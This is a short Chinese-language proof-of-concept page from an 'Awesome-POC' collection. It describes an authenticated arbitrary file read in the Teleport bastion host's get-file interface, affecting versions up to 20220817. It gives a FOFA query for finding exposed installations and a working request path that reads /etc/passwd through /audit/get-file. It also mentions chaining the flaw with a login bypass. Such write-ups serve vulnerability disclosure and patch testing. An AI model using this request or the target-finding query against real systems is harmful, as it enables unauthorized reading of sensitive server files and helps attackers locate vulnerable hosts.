Awesome-POC/网络设备漏洞/Teleport堡垒机 get-file 后台任意文件读取漏洞.md

31 lines
629 B
Markdown
Raw Normal View History

2022-08-24 14:34:12 +08:00
# Teleport堡垒机 get-file 后台任意文件读取漏洞
## 漏洞描述
Teleport堡垒机 get-file接口存在后台任意文件读取漏洞攻击者利用任意用户登录漏洞后可以获取后台权限再进一步利用任意文件读取获取服务器上的敏感文件
## 漏洞影响
```
Teleport Version <= 20220817
```
## FOFA
```
app="TELEPORT堡垒机"
```
## 漏洞复现
登录页面
2022-12-05 11:09:28 +08:00
![image-20220824134958109](./images/202208241355622.png)
2022-08-24 14:34:12 +08:00
登录后使用POC验证
```
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0
```
2022-12-05 11:09:28 +08:00
![image-20220824135554806](./images/202208241355866.png)